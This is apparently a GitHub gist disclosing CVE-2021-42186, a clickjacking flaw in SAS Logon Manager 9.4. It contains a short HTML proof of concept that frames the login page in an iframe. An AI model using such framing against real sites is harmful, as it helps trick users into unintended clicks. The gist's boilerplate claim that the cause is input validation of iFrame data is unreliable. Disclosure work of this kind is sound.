Skip to content

Instantly share code, notes, and snippets.

@rvismit
Last active March 21, 2022 20:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rvismit/22f0cdfb1f7f9237865f4e4e2fd0da38 to your computer and use it in GitHub Desktop.
Save rvismit/22f0cdfb1f7f9237865f4e4e2fd0da38 to your computer and use it in GitHub Desktop.
CVE-2021-42186
Product : SAS
CVE : CVE-2021-42186
Version : Logon Manager - 9.4
Vulnerability : Improper Restriction of Rendered UI Layers or Frames
Vulnerability Description : A vulnerability in the web UI of SAS Logon Manager v9.4 could allow an unauthenticated, remote attacker to affect the integrity of a device via a clickjacking attack. The vulnerability is due to insufficient input validation of iFrame data in HTTP requests that are sent to an affected application. An attacker could exploit this vulnerability by sending crafted HTTP packets with malicious iFrame data. A successful exploit could allow the attacker to perform a clickjacking attack where the user is tricked into clicking a malicious link.
#Steps to Reproduce
1). Create a html file with <anyname>
2). Put This code <iframe src="http://ip:port/" height="550px" width="700px"></iframe>
3). Now save the file and launch on browser.
PoC:
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>I Frame</title>
</head>
<body>
<h3>clickjacking vulnerability</h3>
<iframe src="http://ip:port/" height="550px" width="700px"></iframe>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment